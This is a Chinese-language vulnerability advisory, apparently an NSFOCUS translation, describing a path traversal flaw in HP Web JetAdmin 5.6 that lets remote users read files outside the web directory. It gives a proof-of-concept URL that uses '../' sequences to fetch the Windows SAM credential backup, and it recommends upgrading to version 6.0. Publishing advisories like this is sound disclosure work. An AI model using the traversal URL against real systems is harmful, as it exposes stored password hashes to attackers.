安全研究
安全漏洞
HP Web JetAdmin 5.6 泄漏系统文件
发布日期:2000-05-25
更新日期:2000-05-26
受影响系统:HP Web JetAdmin Version 5.6 (Microsoft Windows 2000)
HP Web JetAdmin Version 5.6 (Microsoft Windows NT 4.0)
HP Web JetAdmin Version 5.6 (HP-UX 10.20)
HP Web JetAdmin Version 5.6 (HP-UX 11.x)
HP Web JetAdmin Version 5.6 (Linux - SuSE)
HP Web JetAdmin Version 5.6 (Novell NetWare)
HP Web JetAdmin Version 5.6 (Red Hat Linux)
HP Web JetAdmin Version 5.6 (Solaris)
描述:
HP Web JetAdmin 5.6 Web 接口服务器缺省监听8000端口,当提交一个特殊格式的URL(包含
"../.."字符)时,一个远程用户将能读取web目录以外的文件的内容。
<* 来源: Underground Security Systems Research (labs@ussrback.com)
http://www.ussrback.com
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.victim.com:8000/cgi/wja?page=/../../../WINNT/repair/sam._
建议:
更新到6.0版,下载地址:
here: http://www.hp.com/cposupport/swindexes/hpwebjetad1880_swen.html
浏览次数:9155
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
